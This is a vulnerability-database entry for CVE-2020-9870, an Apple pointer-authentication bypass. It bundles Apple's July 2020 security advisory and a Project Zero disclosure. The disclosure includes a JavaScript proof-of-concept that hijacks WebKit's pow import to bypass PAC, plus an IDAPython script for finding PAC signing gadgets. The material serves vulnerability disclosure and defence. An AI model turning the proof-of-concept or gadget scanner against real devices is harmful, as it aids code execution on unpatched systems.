ID

VAR-202010-1272

CVE

CVE-2020-9870

TITLE

plural Apple Product logic vulnerabilities

DESCRIPTION

A logic issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. An attacker with memory write capability may be able to bypass pointer authentication codes and run arbitrary code. Apple macOS Catalina is a set of dedicated operating systems developed by Apple for Mac computers. A security vulnerability exists in the Clang component of Apple macOS Catalina versions prior to 10.15.6. An attacker could exploit this vulnerability to bypass security restrictions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2020-07-15-2 macOS Catalina 10.15.6, Security Update 2020-004 Mojave, Security Update 2020-004 High Sierra macOS Catalina 10.15.6, Security Update 2020-004 Mojave, Security Update 2020-004 High Sierra are now available and address the following: Audio Available for: macOS Catalina 10.15.5 Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-9884: Yu Zhou(@yuzhou6666) of 小鸡帮 working with Trend Micro Zero Day Initiative CVE-2020-9889: JunDong Xie and XingWei Li of Ant-financial Light-Year Security Lab Audio Available for: macOS Catalina 10.15.5 Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2020-9888: JunDong Xie and XingWei Li of Ant-financial Light-Year Security Lab CVE-2020-9890: JunDong Xie and XingWei Li of Ant-financial Light-Year Security Lab CVE-2020-9891: JunDong Xie and XingWei Li of Ant-financial Light-Year Security Lab Clang Available for: macOS Catalina 10.15.5 Impact: Clang may generate machine code that does not correctly enforce pointer authentication codes Description: A logic issue was addressed with improved validation. CVE-2020-9870: Samuel Groß of Google Project Zero CoreAudio Available for: macOS High Sierra 10.13.6 Impact: A buffer overflow may result in arbitrary code execution Description: A buffer overflow was addressed with improved bounds checking. CVE-2020-9866: Yu Zhou of 小鸡帮 and Jundong Xie of Ant-financial Light- Year Security Lab CoreFoundation Available for: macOS Catalina 10.15.5 Impact: A local user may be able to view sensitive user information Description: An issue existed in the handling of environment variables. CVE-2020-9934: an anonymous researcher Crash Reporter Available for: macOS Catalina 10.15.5 Impact: A malicious application may be able to break out of its sandbox Description: A memory corruption issue was addressed by removing the vulnerable code. CVE-2020-9865: Zhuo Liang of Qihoo 360 Vulcan Team working with 360 BugCloud Grpahics Drivers Available for: macOS Catalina 10.15.5 Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2020-9799: ABC Research s.r.o. Heimdal Available for: macOS Catalina 10.15.5 Impact: A local user may be able to leak sensitive user information Description: This issue was addressed with improved data protection. CVE-2020-9913: Cody Thomas of SpecterOps ImageIO Available for: macOS Catalina 10.15.5 Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-9936: Mickey Jin of Trend Micro Kernel Available for: macOS Catalina 10.15.5 Impact: An attacker in a privileged network position may be able to inject into active connections within a VPN tunnel Description: A routing issue was addressed with improved restrictions. CVE-2019-14899: William J. Tolley, Beau Kujath, and Jedidiah R. Crandall Mail Available for: macOS Catalina 10.15.5 Impact: A remote attacker can cause a limited out-of-bounds write, resulting in a denial of service Description: An input validation issue was addressed. CVE-2019-19906 Messages Available for: macOS Catalina 10.15.5 Impact: A user that is removed from an iMessage group could rejoin the group Description: An issue existed in the handling of iMessage tapbacks. CVE-2020-9885: an anonymous researcher, Suryansh Mansharamani, of WWP High School North (medium.com/@suryanshmansha) Model I/O Available for: macOS Catalina 10.15.5 Impact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution Description: A buffer overflow issue was addressed with improved memory handling. CVE-2020-9878: Holger Fuhrmannek of Deutsche Telekom Security Security Available for: macOS Catalina 10.15.5 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A logic issue was addressed with improved restrictions. CVE-2020-9864: Alexander Holodny Vim Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6 Impact: A remote attacker may be able to cause arbitrary code execution Description: This issue was addressed with improved checks. CVE-2019-20807: Guilherme de Almeida Suckevicz Wi-Fi Available for: macOS Catalina 10.15.5 Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-9918: Jianjun Dai of 360 Alpha Lab working with 360 BugCloud (bugcloud.360.cn) Additional recognition USB Audio We would like to acknowledge Andy Davis of NCC Group for their assistance. Installation note: macOS Catalina 10.15.6, Security Update 2020-004 Mojave, Security Update 2020-004 High Sierra may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEM5FaaFRjww9EJgvRBz4uGe3y0M0FAl8PNx0ACgkQBz4uGe3y 0M3aXhAAm0hhJpdR0h7uhbtT6LkOuBAYbn0ivAbaB2wzEgZJNXBi9pwd/eL+I1tZ FsYG2Ux0P7VOXClepKzM/yi2Y9w9JZt/u5jSpps7n4/6k4JpcBT74IBF8A4iUvfQ DZcd58rTYf7PuO28ZW9FcYVhgMrN1oPheg0yr+ZaM+0wJrBfPg5STX9AwtPw5P4B aDMYGqv6EQLRiI/cj18/BnLD9kuYq2/fvO/AVjTzAGWVWmY0jpEaaHoeEgSbocNd qVpobhb8K8aK3PjfocK62hSH9DF0yBQYVsnX+bRmTDqzkWK4FXN6fG2ObiI+9ytq wJ6RPT9N5rkIsru8iqaYW6vo5eS61tCAxSgsOsWsm9+KAaBLOnrLzago3kQbtnTG SQBDDSW5w1iI/+kypdCCE67I67psSxPfrDdPU2wG3arQjnE4xm7S4eOE+9cBlKY+ bsNpFcYgShyZ6GnaJ1yVbZgR2zK97xbKYp8xbEOICeCchO1vF31hlDxsMl09UV1U eYJ3sOqBUxDpUj2vjpP9pB4ocSlHdAENL/5dyWUPlx8wjpnodRX2HsPHonjTqM4y kgwJjHI26LZWU4icKIPvl8875ksw/sCmKpVZlbF0IRPvd58ITt5rSvUTQulKqVs6 ML/l/uIf4shjBmNz0xdQlzsdctxdnPh1ge1kNfH34X4JgPWVWaM= =GCJp -----END PGP SIGNATURE----- . It does that by cryptographically signing and validating code pointers (as well as some data pointers) at runtime. However, it seems that imports of function pointers from shared libraries in userspace are not properly protected by PAC, allowing an attacker to sign arbitrary pointers and thus bypass PAC. The preconditions and impact of this issue should be the same as for issue #2042, thus I'm reporting it via our tracker. Consider the following code from WebKit: LValue Output::doublePow(LValue xOperand, LValue yOperand) { double (*powDouble)(double, double) = pow; return callWithoutSideEffects(B3::Double, powDouble, xOperand, yOperand); } This function from the FTL JIT compiler is responsible for lowering a Math.pow invocation (when called with doubles as arguments) by inserting a call to the pow c library function (see `man 3 pow`). In iOS 13.4.1 on arm64e, this function looks as follows when disassembled: ; __int64 __fastcall JSC::FTL::Output::doublePow(JSC::FTL::Output *__hidden this, JSC::B3::Value *, JSC::B3::Value *) __ZN3JSC3FTL6Output9doublePowEPNS_2B35ValueES4_ MOV X4, X2 MOV X3, X1 ADRP X16, #_pow_ptr_3@PAGE LDR X16, [X16,#_pow_ptr_3@PAGEOFF] PACIZA X16 MOV X2, X16 MOV W1, #4 B __ZN3JSC3FTL6Output22callWithoutSideEffectsIPFdddEJPNS_2B35ValueEEEES7_NS5_4TypeET_S7_DpT0_ ; JSC::FTL::Output::callWithoutSideEffects<double (*)(double,double),JSC::B3::Value *>(JSC::B3::Type,double (*)(double,double),JSC::B3::Value *,JSC::B3::Value *) ; End of function JSC::FTL::Output::doublePow(JSC::B3::Value *,JSC::B3::Value *) This code essentially loads a pointer from a static address, then signs it with the PACIZA instruction [2] and passes it on to the callWithoutSideEffects function, which then embeds a call to it into the emitted JIT code. Note that no PAC validation of the loaded function pointer is performed, and in fact, the retrieved pointer is not PAC-signed at all. As the region from which the pointer is loaded is writable, an attacker is able to change the function pointer stored there, causing WebKit to later sign and execute an arbitrary address. The following JavaScript code snippet demonstrates this, assuming the attacker has already achieved arbitrary memory read/write: // offset from iOS 13.4.1, iPhone Xs let powImportAddr = Add(jscBase, 0x34e1d570); memory.writePtr(powImportAddr, new Int64('0x41414141')); function trigger(x) { return Math.pow(x, 13.37); } for (let i = 0; i < 10000000; i++) { trigger(i + 0.1); } This will cause the renderer process to crash with PC at 0x41414141, demonstrating that PAC has been bypassed. The vulnerable code pattern seems to be widespread, for example, here is a similar piece of code from libxpc: libxpc:__text:00000001AA9A5F00 ADRP X16, #_free_ptr_1@PAGE libxpc:__text:00000001AA9A5F04 LDR X16, [X16,#_free_ptr_1@PAGEOFF] libxpc:__text:00000001AA9A5F08 PACIZA X16 It seems that this problem generally occurs whenever a function from a shared library is referenced as pointer as opposed to being called directly. I used an IDAPython script to search the dyld shared cache for PAC signing gadgets such as this one. It is still very rudimentary at this point, but I'm attaching it below. The script will search for PAC signing instructions, then output their location as well as the potential \"gadget\" (which includes the four preceding instructions) into a file. Afterwards, that file can be searched for interesting code patterns. There are a few very frequent but safe patterns such as `ADRL X16, sub_1AA9A6F94; PACIZA X16` (which signs a constant pointer). They can, for the most part, easily be removed from the output file though (e.g. with \":g/ADRL/d\" in vim). Ideally, in the future the script itself would be able to identify these patterns and skip them. import idautils import idaapi import ida_nalt import idc from os.path import expanduser home = expanduser(\"~\") mnemonics = ['PACIA', 'PACIZA', 'PACIA1716', 'PACIAZ'] gadgets = [] for seg_ea in idautils.Segments(): seg_name = idc.get_segm_name(seg_ea) seg_start = idc.get_segm_start(seg_ea) seg_end = idc.get_segm_end(seg_ea) for func_ea in idautils.Functions(seg_start, seg_end): for (start_ea, end_ea) in idautils.Chunks(func_ea): for head in idautils.Heads(start_ea, end_ea): insn = idautils.DecodeInstruction(head) if not insn: continue if insn.itype == idaapi.ARM_pac: disas = idc.GetDisasm(head) if not any(mn in disas for mn in mnemonics): continue parts = [] for ea in range(head - 20, head + 4, 4): parts.append(idc.GetDisasm(ea)) gadgets.append('{}:0x{:x} '.format(seg_name, head) + '; '.join(parts)) with open(home + \"/Desktop/gadgets.txt\", \"w\") as f: f.write('\ '.join(gadgets)) f.write('\ ') print(\"Done, found {} gadgets\".format(len(gadgets))) [1] https://support.apple.com/guide/security/pointer-authentication-codes-seca5759bf02/web [2] https://developer.arm.com/docs/100076/0100/instruction-set-reference/a64-general-instructions/pacia-paciza-pacia1716-paciasp-paciaz This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2020-08-18. Disclosure at an earlier date is possible if agreed upon by all parties. Related CVE Numbers: CVE-2020-9870. Found by: saelo@google.com

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

input validation error

CONFIGURATIONS

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

saelo, Google Security Research

SOURCES

LAST UPDATE DATE

2024-11-23T19:28:30.807000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE